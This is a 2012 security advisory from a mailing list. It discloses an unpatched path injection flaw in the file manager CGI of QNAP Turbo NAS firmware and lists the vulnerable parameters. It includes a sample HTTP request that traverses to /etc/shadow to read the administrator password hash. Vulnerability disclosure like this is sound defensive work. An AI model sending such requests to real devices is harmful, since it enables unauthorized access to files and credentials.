Web Application Security
QNAP Turbo NAS Multiple Path Injection Sep 04 2012 07:52AM
Andrea Fabrizi (andrea fabrizi gmail com)
**************************************************************
Vulnerability: Multiple Path Injection
Product: QNAP Turbo NAS
Vendor: QNAP
Version affected: <= 3.7.3 build 20120801
Status: Unpatched
Website: http://web.qnap.com/pro_detail_feature.asp?p_id=202
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
**************************************************************

This vulnerability has been discovered on QNAP TS-1279U-RP, but probably
other products that use the same firmware may be affected.

The CGI "/cgi-bin/filemanager/utilRequest.cgi" is prone to a path
injection, which makes it possible,
for authenticated users, to access, delete o modify any file, included
system files, configuration files and
files owned by other users.

Due to the single user configuration of the embedded linux system, it
is possible to access
any system file without restrictions (included /etc/shadow, that
contains the hash of the administrator password).

Vulnerable parameters are (the list is not exhaustive):
/cgi-bin/filemanager/utilRequest.cgi [source_file]
/cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name]
/cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name]

Sample HTTP request:
###########################################################
POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1
Host: 192.168.0.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

isfolder=0&func=download&sid=12345abc&source_total=1&source_path=/myFile
s&source_file=../../../etc/shadow
###########################################################

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus